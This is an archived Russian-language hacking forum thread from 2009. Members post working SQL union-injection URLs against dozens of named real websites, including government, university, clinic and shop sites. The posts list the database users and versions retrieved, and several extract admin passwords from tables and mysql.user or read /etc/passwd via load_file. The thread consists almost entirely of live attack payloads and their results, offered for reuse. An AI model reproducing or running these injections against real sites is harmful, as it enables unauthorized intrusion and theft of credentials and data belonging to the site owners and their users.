Просмотр полной версии : SQL Инъекции
http://heroi.org.ua/img.php?id=-301+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version())+--+
User: freemp3_slovo@193.200.173.5
Database: freemp3_slovo
Version: 4.1.22-log
Sivanandabahamas.org pr4
Sivananda Bahamas Yoga Retreat. )
http://www.sivanandabahamas.org/index.php?page_id=null+union+select+conc at_ws(char(32,124,32),version(),user(),database(), @@version_compile_os)+--+5.0.27-log | my_yoga_net@localhost | my_yoga_net | redhat-linux-gnu
ILYAtirtir
21.10.2009, 18:44
Фонд социальной поддержки сотрудников и ветеранов таможенной службы (Фонд С.В.Т.С.).
http://svts.ru/cgi-bin/eng.pl?type=2&id=-322+union+select+1,concat_ws(0x3a,database(),user( ),version()),3+--+§ion=fund_link
svts:root@localhost:5.0.45
Белорусский Государственный Институт Метрологии.
http://www.belgim.by/viewcat.php?cat_id=-11+union+select+1,2,3,concat_ws(0x3a,database(),us er(),version()),5,6,7,8,9
belgimby:belgim@localhost:5.1.39
diman94x
21.10.2009, 22:18
Server = Apache/2.0.54 (Fedora)
Version = 5.0.79
Powered by = PHP/5.2.8
Attack Type = SQL Union Injection
Current User = lactuel@localhost
Current Database = lactuel
Supports Union = yes
Union Columns = 19
Url| http://www.lactuel.be/index.php?catId=-106
Vuln: http://www.lactuel.be/index.php?catId=-106+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Офф сайт художницы Джулии Гилмор pr-3
http://www.juliagilmore.ca/gallery.php?pageid=17+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13---
andreakr_julia@localhost
5.0.81-community-log
andreakr_julia
Shop какой то.
http://www.thethingsiwant.com/wishing/addtolist_s.php4?ItemID=-108891+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,u ser(),database(),version()),9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23+--+
User: root@localhost
Database: whitestripe3
Version: 4.1.22-standard
http://www.ssprava.org/index.php?id=-3+union+select+version%28%29,2
Adt.com.tw pr5
Bureau Veritas ADT *щито?
http://www.adt.com.tw/indexNewsData.phtml?NEWSID=1'+and+substring(versio n(),1,1)=3+--+version: 3.23.58
user: user1@localhost
database: my_news
http://www.red-army.ru
Все о спорте, все о ЦСКА!
http://www.red-army.ru/news/?a=news&id=1453+union+select+1,2,3,concat_ws(char(58),TABL E_SCHEMA,TABLE_NAME,COLUMN_NAME)+from+INFORMATION_ SCHEMA.COLUMNS/*
http://www.red-army.ru/news/?a=news&id=1453+union+select+1,2,3,concat(user,char(58),pa ssword)+from+users+limit+2,1/*
[underwater]
22.10.2009, 18:59
http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11 ,12--
http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,concat(table_name),3,4,5,6,7, 8,9,10,11,12+FROM+information_schema.tables+LIMIT+ 22,1--
http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,group_concat(column_name),3,4 ,5,6,7,8,9,10,11,12+from+information_Schema.column s+where+table_name=0x68616c5f61646d696e69737472617 46f7273--
http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,group_concat(emailid,0x3a,Use rID,0x3a,Password),3,4,5,6,7,8,9,10,11,12+from+hal _administrators
http://museums-foreningen.dk/viewer.php4?uniq_id=-1010083+union+select+1,2,3,4,5,concat_ws(0x3a,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23+--+
User: museums_fo@linux3.123hotel.dk
Database: museums_foreningen_dk_db
Version: 5.0.27-standard
http://www.tabacum.ru/shoppic.php?id=-3+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user (),database(),version())--
Database Version: 4.1.25-log
Database name: wwwlena_ivanovaru_tabacum
User name: lenaivan@localhost
Футбольная Трансферная Биржа
http://legion21.com.ua/exchange/cv.php?id=-45+union+select+1,2,3,4,5,6,7,version(),9
Database Version: 4.1.22-log
Database name: legion21
User name: u_legion21@localhost
Украинский Опель Клуб
http://www.opel-club.com.ua/partner/index.php?category=-1+union+select+1,2,database%28%29,version%28%29,5
Database Version: 5.0.51a-log
Database name: opelclub_phpmydirectory
User name: opelclub_cards@localhost
ТВ,Интернет Магазин "Як Барбі"
http://tvshop.com.ua/catalog.php?cid=0+union+select+1,version(),3,4,5/*
Database Version: 4.0.27-standard-log
Database name: I-shop
User name: i-shop@localhost
Сканер сказал, что в http://apg-ua. com/index.php?o=66+and+31337-31337=0+--++ возможна инъекция, но что я не пишу в запрос - в ответ ничего. Помогите, пожалуйста, советом.
Это в "Ваши вопросы по уязвимостям"
http://webcaredesign.dk/viewer.php4?uniq_id=-1010001+union+select+1,2,3,4,5,concat_ws(0x3a,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23+--+
User:tastselvwe@80.160.71.24
Database:tastselvweb_dk_db
Version:5.0.27-standard
5.0.44-log:MySQLr00t@localhost
http://nasrcityco.com/ar/newsdetails.php?id=-100+union+select+concat_ws(0x3a,version(),user()), 2,concat_ws(0x3a,host,user,password,file_priv),4+f rom+mysql.user
http://nasrcityco.com/ar/newsdetails.php?id=-100+union+select+load_file(0x2F6574632F70617373776 4),2,3,4
www.louvores.net
http://www.louvores.net/home.php?genres_parent=11+union+all+select+concat_ ws%280x3a,version%28%29,database%28%29,user%28%29% 29,2,3,4,5,6--
user:louvores_root@localhost
vers:5.0.81-community
base:louvores_opial
www.freerfmusic.com
http://freerfmusic.com/home.php?genres_parent=12+union+all+select+concat_ ws%280x3a,version%28%29,database%28%29,user%28%29, 2,3,4,5,6,7--
user:freerfmu_llk@localhost
vers:5.0.81-community
base:freerfmu_mdb
hack-win32
23.10.2009, 14:49
sportsbl@localhost:bolang:5.0.51b-enterprise-gpl
http://www.sportsbl.com/hot/mp3.php?ID=-10420+union+select+1,2,concat_ws(0x3a,user(),datab ase(),version()),4,5,6,7--
hutorby_mp3@localhost:hutorby_mp3hits:4.1.22-standard
http://mp3hits.hutor.by/radionext-mp3.php?id=-6+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6--
http://www.handelsgilde-muenchen.de/m_veranstaltungen_termin.php4?tid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x3a,user(),database(),version())--
User: dbo109396152@212.227.127.130
Database: db109396152
Version: 4.0.27-max-log
Чуть раньше постил о SQL на CMC.dk, вот ещё нашёл в одном месте.
http://www.cmc.dk/artist.php4?id=-114+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+--+
cmcdk2@light.securehosting.dk:cmcdk2:4.0.24-log
http://marina-look.com/showimg.php?id=-123+union+select+1,concat_ws(char(58),user(),datab ase(),version()),3,4--
MARINALOOK_DB01@LOCALHOST:MARINALOOK_DB01:4.1.22-STANDARD
pr:3
http://www.soulgate.dk/view-blog.php4?blogID=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45+--+
User: mandala@anvil.thebook.com
Database: mandala
Version: 4.1.20-standard-extsql-log
http://www.colinco.net/printview.php4?uniq_id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),dat abase(),version()),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23+--+
User: colincoins@80.160.71.25
Database: colincoinstitute_dk_db
Version: 5.0.67-log
I love this game
23.10.2009, 23:22
PR = 5
_http://sdsb.lums.edu.pk/pages/sdsb_faculty_detail.php?id=-3+union+select+1,2,3,4,5,version(),7,8,9,10,11,12--
4.0.20 7
http://www.chu-cme.org/backoffice/newsletter/preview.php?id=15+UNION+SELECT+1,user(),3,4,5,6,7, 8
Database Version: 5.0.67
Database name: chucme
User name: chucme@localhost
www.hackzone.ru
==================
5.0.27-log : root@ : localhost : root : : Y
http://www.manuals.ws/files/list.php?cat=-1+union+select++1,2,concat_ws(0x203a20,version(),u ser(),host,user,password,file_priv),4,5+from+mysql .user--
http://www.manuals.ws/files/list.php?cat=-1+union+select+1,2,load_file(0x2f6574632f706173737 764),4,5--
В конфигах Апача пути до:
ServerName cracks.hackzone.ru
ServerName mbloc.hackzone.ru
ServerName nod32.hackzone.ru
ServerName www.hackzone.ru
ServerName thecracks.us
ServerName www.crackspider.de
ServerName needcrack.us
ServerName cracks.thebugs.us
ServerName serials.thebugs.us
ServerName www.crackway.com
ServerName www.crackportal.com
ServerName bestcracks.net
и др.
работает outfile.
Посмотрел на Хакзону изнутри, полезно.
Просьба, не вредить проекту.
MaxRaziel
24.10.2009, 01:20
http://www.aoya-hk.com/news.php?id=-1%20union%20select%201,user(),database(),4,5,6,7,8 ,9,10,11/*
http://www.jordan-home.net/current-news.php?news=-31+union+select+1,2,concat_ws(char(58),user(),data base(),version()),4,5--
alla5sam_site@uk3.valuehost.co.uk:alla5sam_site:4. 0.27-max-log
Уязвимы все сайты от 21web.ru с mysql
http://petfoods.dk/index.php4?traeid=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())+--+
User: root@localhost
Database: dbpetfoods
Version: 5.0.27
http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+version()
Version: 5.0.27
На user() и database() отвечает ошибкой.
На user() и database() отвечает ошибкой.
http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+hex(user())
http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+hex(database())
root@localhost : dbalecto
---------------------
5.0.51a-3ubuntu5.1 : root@10.2.22.101 : localhost : root : Y
http://www.combatlifestyle.com/mov/view_movie.php?id=-1+union+select+1,2,3,concat_ws(0x203a20,version(), user(),host,user,password,file_priv),5,6,7,8,9,10, 11,12,13,14,15,16,17,18+from+mysql.user--
http://www.combatlifestyle.com/mov/view_movie.php?id=-1+union+select+1,2,3,load_file(0x2f6574632f7061737 37764),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
http://www.naesekorrektion.dk/printview.php4?uniq_id=-1010007+union+select+1,2,3,4,5,concat_ws(0x3a,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23+--+
User: frederiksb@linux1.123hotel.dk
Database: frederiksborgklinikken_dk_db
Version: 4.1.22-standard
http://www.maindata.info/index.php?id=-1+union+select+1--
4.0.27-standard
maindatask
maindatask@10.2.194.84
Amdell_13
25.10.2009, 21:44
http://www.turkeyexportline.com/category.php?IndustryID=4+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
http://worldb2b.org/category.php?IndustryID=9+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
http://www.caribzar.com/category.php?IndustryID=25+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.lebargain.co.cc/category.php?IndustryID=4+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
http://www.lankahub.com/category.php?IndustryID=44+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.caribzar.com/category.php?IndustryID=23+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.singhbaba.com/category.php?IndustryID=68+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://justclone.com/alibabaclone/category.php?IndustryID=20+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://buyerxpo.com/category.php?IndustryID=34+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.ores21.com/category.php?IndustryID=49+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.lebargain.co.cc/category.php?IndustryID=27+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.euroindiam.com%20;%20www.ores21.com/category.php?IndustryID=65+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
XD
http://www.fibertech.jp/eng/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--
User: asu1340@localhost
Version: 5.0.83
Database: asu1340
s0l_ir0n
26.10.2009, 08:04
Авто рынок:
http://www.avtopark.kz/index.php?show=art&id=-1+union+select 1,2,3,ConCat_ws(0x3a,user(),database(),version()), 5,6,7,8 --
http://www.standardmedia.co.ke/InsidePage.php?id=-1+union+select+1,2,3,concat_ws(0x203B20,user(),dat abase(),version()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42+--+&cid=4&ttl=Ocampo+probe+team+hires+Swahili+speakers
user: eastand_guest@172.16.13.226
database: eastand_xp
version: 5.0.81-community-log
Slavuti4
26.10.2009, 23:28
ready-rest.com(ТИЦ-50,PR-3)
http://www.ready-rest.com/bases.php?base_code=-24+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54
Version():4.0.27-max-log
Database():ready128
User():ready128@v3.valuehost.ru
heliostour.com(ТИЦ-50,PR-1)
http://www.heliostour.com/index.php?content=-38+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11+--+
Version():4.1.22-log
Database():helio
User():u_helio@localhost
sevur.com.ua(ТИЦ-20,PR-3)
http://www.sevur.com.ua/base.php?hid=-2+union+select+concat_ws(0x3a,version(),user(),dat abase()),2
Version():4.1.22-standard-log
Database():sevur_tour
User():sevur_sevur@localhost
crimea-tourcenter.com(ТИЦ-30,PR-2)
http://www.crimea-tourcenter.com/search.php?type_id=-5+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Version():5.0.51a-community
Database():crimeato_crimea
User():crimeato_crimea@localhost
krimtek.com.ua(PR-1)
http://krimtek.com.ua/onenews?news=-1036+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on(),user(),database()),8,9,10,11,12,13,14,15,16+--+
Version():4.1.22-log
Database():krimtek
User():u_krimtek@localhost
stroytel.com(ТИЦ-20,PR-3)
http://www.stroytel.com/showmart.php?code=-12+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4
Version():4.1.22-standard
Database():stroytel_db
User():stroytel_db@213.186.117.118
http://www.aratta-ukraine.com/sacred_ua.php?id=999999+union+select+1,2,3,4,5,6,7 ,8,9,10,concat_ws(0x203B20,unhex(hex(user())),unhe x(hex(database())),unhex(hex(version()))),12,13,14 ,15,16,17,18,19,20,21,22+--+
user: root@localhost
database: portal
version: 5.1.7-beta
Тур оператор
http://www.ukrviza.vn.ua/liste.php?operation=1&nav_id=11&ware_id=-55%20Union%20Select%201,2,3,4,version%28%29,6,7,8, 9,10,11,12%20--
Version = 5.0.32-Debian_7etch3-log
User = ukrviza@localhost
Database = ukrviza
http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,2,3,4,5,6,7,8,9--
Version: 5.0.81-community-log
User: accupost@localhost
Database: accupost_oneinchristdb
http://www.seaofstories.com/title.php?id=37+UNION+SELECT+1,2,3+LIMIT+1,1
Database Version: 5.0.86-community-log
Database name: seaos_sos
User name: seaos_david@216.86.146.12
http://www.johnlaingpartnership.co.uk/newsdetail.php?article_id=286+UNION+SELECT+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31+FROM+users+LIMIT+1,1
Database Version: 4.1.22-log
Database name: jlpdb
User name: jlpuser@localhost
users:user_email:user_id:user_password
админка хз де ((
pr 6
http://www.nescent.org/news/newsdetail.php?id=120+UNION+SELECT+1,2,3,4,5,6,7,8 ,9+LIMIT+1,1
Database Version: 5.0.67-log
Database name: events
User name: readonly@localhost
http://www.caup.washington.edu/Events/newsdetail.php?newsid=20+UNION+SELECT+1,2,3,4,5,6+ LIMIT+1,1
Database Version: 4.0.26-standard
Database name: caup
User name: caupreader@localhost
http://www.arborcarehouston.net/newsdetail.php?id=21+UNION+SELECT+1,2,3,4,5,6,7,8, 9+LIMIT+1,1
Database Version: 4.1.22-max-log
Database name: embark_services
User name: embark_services@97.74.144.200
Информационно-аналитический журнал Морской Флот
http://www.morflot.su/article.php?id=1077+and+1=0+Union%20Select%20UNHEX %28HEX%28version%28%29%29%29%20,2,3%20--
Version = 4.1.13a-nt-max-log
User = 1gb_morflot@10.0.1.27
Database = 1gb_morflot
Институт региональной прессы
http://www.pdi.spb.ru/article.php?id=806+and+1=0+Union+Select+1,2,UNHEX% 28HEX%28version%28%29%29%29,4,5,6,7,8
Version = 5.0.45
User = pdi@localhost
Database = pdi_spb_ru
http://hakatai.mcli.dist.maricopa.edu/mlx/slip_about_sharebacks.php?item=1711+and+2=1+union+ select+1,2,3,4,5,unhex%28hex%28concat_ws%280x3a,us er(),database(),version()%29%29%29%23
User: mcliweb@www.mcli.dist.maricopa.edu
Database: mlx
Version: 5.0.18-log
hack-win32
27.10.2009, 08:58
casper_richie@localhost:casper_main:5.0.81-community
http://www.thecasper.jp/mail.php?id=-45+union+select+concat_ws(0x3a,user(),database(),v ersion()),2--
aya_bp2005@192.168.101.79:aya_bpdb2:5.0.45-log
http://alumni.yale.edu/aya/blueprint/type.php?id=-3+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6--
mfpseals@localhost:mfpseals:4.1.21-standard
http://mfpseals.com/type.php?id=-6+union+select+concat_ws(0x3a,user(),database(),ve rsion())--
sstanifor@213.171.218.161:sstanifor:5.0.77-log
http://www.s-staniforth.co.uk/Type.php?id=-2+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4--
HAXTA4OK
27.10.2009, 10:21
http://www.artpaints.ru/firm/index.php?cat=13&subcat=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7--
4.1.22-standard:artpaint_kraski:artpaint_loftyst@lo
http://www.furnitureforbusiness.com.au/newsDetail.php?pid=61+UNION+SELECT+1,2
Database Version: 4.1.22
Database name: furn4biz
User name: furn4biz@localhost
WOMEN.IT
пр 6
http://www.women.it/casadonne/comecitrovi/ricerca/browseass.php3?record=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58,5 8),user(),database(),version()),10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37--
women@localhost::casadonne::4.0.24_Debian-10sarge3-log
http://www.women.it/casadonne/comecitrovi/ricerca/browseass.php3?record=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58,5 8),user,password),10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7+from+mysql.user--
http://www.star-design.org/index.php?id1=-269+union+select+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10--
4.1.25-log:stadesig@localhost:wwwstadesignru-в исходнике
пр:4
http://www.leproscenium.com/Detail.php?IdPiece=-763+union+select+1,2,concat_ws(char(58,58),user(), database(),version()),4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39--
leprosceniumcom@88.191.253.212::leprosceniumcom::5 .0.51a-3ubuntu5.4-log
Таблетки Рекицен-РД (чесно не знаю таких)
http://rekicen.ru/php/content.php?group=1&id=575+and+1=0+=null%20Union%20Select%20%201,conca t_ws%280x3a,user%28%29,database%28%29,version%28%2 9%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37
gastroport_rekic@localhost::gastroport_rekic::5.0. 26-log
Смирнов Б.Л Учителя России
http://www.bolesmir.ru/index.php?content=books&name=dictionary_item&dictionary=thema&item_id=5+and+1=0+Union Select+1,UNHEX(HEX(version()))
Version = 5.0.77
User = root@zvm2.host.ru
Database = mav_db ::information_schema::index_search::mav_db:mysql:: newforum
Наркологическая клиника "Мегаполис Медэкспресс":
http://www.megamed.spb.ru/index.php?nomer=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Version: 5.0.26-log
Database: engelsa150
User: engelsa150@localhost
Тoсненский Телекоммуникационный Центр:
http://www.tosnotelecom.ru/index.php?nomer=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Version: 5.0.45-log
Database: ttc
User: root@localhost
Мед. центр Альтермед:
http://www.altermed.ru/index.php?nomer=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5/*
Version: 4.1.22-lk-log
Database: altermed_new
User: altermed_new@localhost
http://wwh.nsys.by/vis.php?id=-1'+union+select+1,2,3,4,concat_ws(0x203B20,user(), database(),version()),6+--+
user: photounion@194.158.194.25
database: photounion_by
version: 5.0.45-log
http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,concat_ws(0x3a,version(),d atabase(),user()),3,4,5,6,7,8,9--
5.0.24a-Debian_9ubuntu2.4-log:musics:musics@localhost
and...
http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,unhex(hex(concat_ws(0x3a,u sername,password))),3,4,5,6,7,8,9+from+tele.auth_u ser_md5--
http://www.newhorizons.com.ua/news_detail.php?id=-72 union select 1,2,3,4,5,concat_ws (0x3a,user(),d atabase(),version()),7,8 --
u_newhorizon@localhost
newhorizons
5.0.51a-24+lenny2-log
http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,concat_ws(0x3a,version(),d atabase(),user()),3,4,5,6,7,8,9--
usrmcv@localhost:fmcr:5.1.36-0.dotdeb.0
http://www.iase.ru/objects.php?group=1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())/*
5.0.45:iase@localhost:iase
http://www.newfazenda.ru/user/about.php?id=-1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())
5.0.75:novysvetru@78.108.81.161:novysvetru_fazend
http://www.teplo-spb.ru/catalog?id=48&maker=-1/**/union/**/select/**/1,2,3,4,concat_ws(0x3a,user%20(),database(),versio n()),6,7,8,9,10,11,12/*
teplospbru@localhost:teplospbru:5.0.26-lk-log
crazy~driver
30.10.2009, 00:57
http://www.sportscow.com/scoreboard.php?yid=0910&sport=101+and+1=2+union+select+version()%20#
http://www.craigolsonsports.com/feature.php?fid=8+and+1=2+union+select+COLUMN_NAME ,2,3+from+information_schema.COLUMNS+where+TABLE_N AME=0x7573657273+--+
http://www.autore.biz/content.php?id=6+UNION+SELECT+1,2+LIMIT+1,1
Database Version: 4.1.14
Database name: autoredb
User name: autore@localhost
mysql.user found in DB
http://www.dieselchiptuning.biz/pages/content.php?id=3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13
Database Version: 5.0.22
Database name: beena
User name: beena@localhost
таблицы
16 :In database beena found table aantekening
17 :In database beena found table abbreviations
18 :In database beena found table bedrijf
19 :In database beena found table bedrijfsgegevens
20 :In database beena found table budget
21 :In database beena found table contacten
22 :In database beena found table contactpersonen
23 :In database beena found table contactpersonen_old
24 :In database beena found table credits
25 :In database beena found table customers
26 :In database beena found table dct_email
27 :In database beena found table dealers
28 :In database beena found table emailadressen
29 :In database beena found table errormail
30 :In database beena found table logging
31 :In database beena found table mailinglist
32 :In database beena found table mailinglist_copy
33 :In database beena found table nieuwsbrief
34 :In database beena found table nieuwsbrief_copy
35 :In database beena found table nieuwsbrief_item
36 :In database beena found table onderdelen
37 :In database beena found table order_lost
38 :In database beena found table paragraaf
39 :In database beena found table product_type
40 :In database beena found table producten
41 :In database beena found table productgroepen
42 :In database beena found table sectoren
43 :In database beena found table shop_item
44 :In database beena found table shop_orders
45 :In database beena found table talen
46 :In database beena found table tips
47 :In database beena found table typen
48 :In database beena found table userrights
49 :In database beena found table vaste_teksten
50 :In database beena found table visitors
51 :In database beena found table voertuigen
52 :In database beena found table voertuigen_copy
53 :In database beena found table voertuigen_copy_copy
54 :In database beena found table voertuigen_old
The B.O.S.S. Board:
http://www.thebossboard.com/article.php?newid=-1+union+select+1,2,3,4,5,6--
DB Version: 4.1.22-max-log
DB name: bossboard
DB user: bossboard@97.74.144.124
http://dl.game.21cn.com/list.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22--
Version: 4.0.20-log
Database: pise
User: pise@59.36.102.212
http://www.gangotri.ru/cs?action=itemd&itid=-960+union+select+concat_ws(0x3a,user(),database(), version())--
b2005321_1@localhost:2005321_1:5.0.51-log- в исходнике
http://www.muscul.ru/article.php?id=-8/**/union/**/select/**/1,2,user(),version(),5,6,7,8,9/*
musculr4_first@localhost 4.1.25-log
http://www.watches.ru/index.php?page=30&art=1/**/union/**/select/**/concat_ws(0x3a,user(),database(),version())/*
lukonin@localhost:newwatches:4.1.25
http://www.ukrlogistica.com.ua/news.php?id=-370+union+select+1,2,concat_ws(0x3a,database(),use r(),version()),4,5,6--
jstudio_test:jstudio_Si@localhost:4.1.22-standard-log
http://www.e-portal.com.ua/news.php?id=-8+union+select+1,group_concat(0x3a,user(),database (),version()),3,4,5,6,7,8,9,10,11,12,13--
:ukrfoto_user@192.168.2.3ukrfoto_db5.0.51a-log
Студия 3Dform
http://3dform.ru/?lg=se&a=portfolio&project=37&id_service=7&id=229%20union%20select%201,2,3,4,5,6,concat_ws%28 0x3a,nikname,password%29,8,9,10,11,12%20from%20use r%20--
a7489_2:a7489_2@95.142.35.1:5.0.75-percona-highperf-b11-log
Пр:4
http://apiexchange.com/index_main.php?id=8&idz=-16+union+select+1,2,3,4,5,6,7,8,9,10,11--
Database Version: 4.0.20
Database name: api
User name: apiconnect2@localhost
http://apiexchange.com/index_main.php?id=8&idz=-16+union+select+1,concat_ws(char(58),user,password ),3,4,5,6,7,8,9,10,11+from+mysql.user+limit+0,1--
Студия Граф, создание и продвижение сайтов
http://www.7ae.ru/portfolio.php?id=-72%27%20union%20select%201,2,3,4,group_concat%280x 3a,user%28%29,database%28%29,version%28%29%29/*
Version:5.0.26-log
Database:grafrru_7ae
user:grafrru_7ae@localhost
Охрана труда и промышленная медицина:
http://okhranatruda.ru/view_page.php?page=-1+union+select+1,2,3,4,5,6,7,8,9--
Version: 4.1.25-log
Database: aeropho6_okhrana
User: aeropho6_odmin@localhost
Выводимые поля: 2, 5.
Доступ к mysql.user: Нет.
http://www.templariusze.org/artykuly.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+
HostiaWeb.Com - High End Shared, Reseller and Dedicated Web Hosting
http://www.hostiaweb.com/news.php?id=-1+union+select+1,database(),user(),version(),5
Version: 5.1.37
Database: hostw_news
User: hostw_news@localhost
P.S. не работает when в запросах =/
http://www.nlrc.gov.ng/publications.php?id=4+union+select+1,concat_ws(0x3 a,id,username,password),3,4,5,6,7+from+adminlogin--
id:username:password
==========================
http://www.hudcc.gov.ph/index.php?p=88&type=2&sec=29&aid=-4+union+select+1,group_concat(0x0b,column_name)+fr om+information_schema.columns+where+table_name=0x6 1646D696E6973747261746F7273
http://www.hudcc.gov.ph/index.php?p=88&type=2&sec=29&aid=-4+union+select+1,group_concat(0x0b,email,0x3a,name ,0x3a,pass)+from+administrators
Словарь Даля онлайн:
http://slovardalja.net/word.php?wordid=-1+union+select+1,2,3--
Version: 5.0.81-community-log
Database: slovarda_daldictionary
User: slovarda_daluser@localhost
Выводимые поля: 2,3.
Доступ к mysql.user: Нет.
ABBYY Lingvo:
http://www.lingvo.ru/lingvox3/?id=1+or+1=@@version--
Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: )
Database: Publishing
User: publishing
jokester: Объединяй посты КНОПКА EDIT ===>>
http://www.bdva.ru/funclub_details.phtml?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11--
5.0.45-log:bdva_sql@78.140.133.152:bdva
http://ksr.infoshare.ru/lib/?div=-5+union+select+concat_ws(0x3a,user(),version(),dat abase())--
ksrinfoshare@localhost:5.0.51a-log:h_ksr
http://www.greeceforyou.ru/hotels.php?id=76/**/union/**/select/**/1,concat_ws(0x3a,user(),version(),database()),3/*
greeceforyou-ru@fhe.hoster.ru:4.0.27-log:greeceforyou-ru
http://www.avtodirect.ru/doc.php?supplyID=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database())/*
4.0.16-log:avtodirect@localhost:avtodirect_ru
pelligrim
31.10.2009, 22:08
http://www.tax.vsem.com.ua/index.php?page=news.html&idnn=2432+union+select+1,2,3,4,concat_ws%280x3a,un hex%28hex%28version%28%29%29%29,unhex%28hex%28user %28%29%29%29,unhex%28hex%28database%28%29%29%29%29 +from+information_schema.tables--
5.0.18-nt-log:1gbua_seren@213.186.117.201:1gbua_seren
http://www.jamescourtney.com.au/media/news?id=4+union+select+1,2,concat_ws(0x3a,version( ),user(),database()),4,5--
5.0.81-community:jamescou_jamesco@localhost:jamescou_shoc kcustom
http://www.gpstuner.com/en/news?id=99999+union+select+1,concat_ws(0x3a,versio n(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25--
5.1.35-log:gpstuner@localhost:gpstuner
http://linvo.org/?page=news&id=99999+union+select+1,concat_ws%280x3a,version%2 8%29,user%28%29,database%28%29%29,3,4,5--
5.0.32-Debian_7etch11-log:linvo@localhost:linvo
